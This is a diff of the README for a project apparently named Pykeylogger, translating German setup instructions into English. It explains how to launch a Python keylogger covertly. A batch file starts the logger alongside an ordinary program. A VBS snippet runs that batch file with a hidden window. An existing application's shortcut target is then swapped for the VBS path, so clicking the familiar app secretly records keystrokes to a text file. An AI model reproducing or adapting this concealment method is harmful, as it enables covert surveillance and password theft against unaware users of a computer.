loztle/Pykeylogger/README.md

 # Pykeylogger
-Pykeylogger in kombination mit cmd file zum gleichzeitigen öffnen von files und des keyloggers
+Pykeylogger a combination of cmd and the keylogger to start the keylogger with clicking the application

 change  file path ("c:/keystrokes/") to your prefered path to save the keystroke text file
-change the two paths in
+change the two paths in batchconnect.txt save .txt as .bat
-programm als .bat datei abspeichern

-danach vbs program integrieren damit die bat datei unsichtbar gestartet werden kann
+after that you integrate .vbs into your .bat file for an invisible start of the command line

 Set WshShell = CreateObject("WScript.Shell")
-WshShell.Run chr(34) & "C:\(bat datei zum öffnen der zwei programme)batchconnect.bat" & Chr(34), 0
+WshShell.Run chr(34) & "C:\(batchconnect path)batchconnect.bat" & Chr(34), 0
 Set WshShell = Nothing

-c pfad durch bat datei pfad ersetzen und als .vbs abspeichern

-dann .vbs datei mit icon verbinden unter eigenschaften verknüpfung und dann vbs datei pfad in ziel einspeichern
+change the c:\ path to the batchconnect.bat path save the document as .vbs

+right click the application you bound to your keylogger click settings then shortcuts then target and then you copy paste your vbs path in there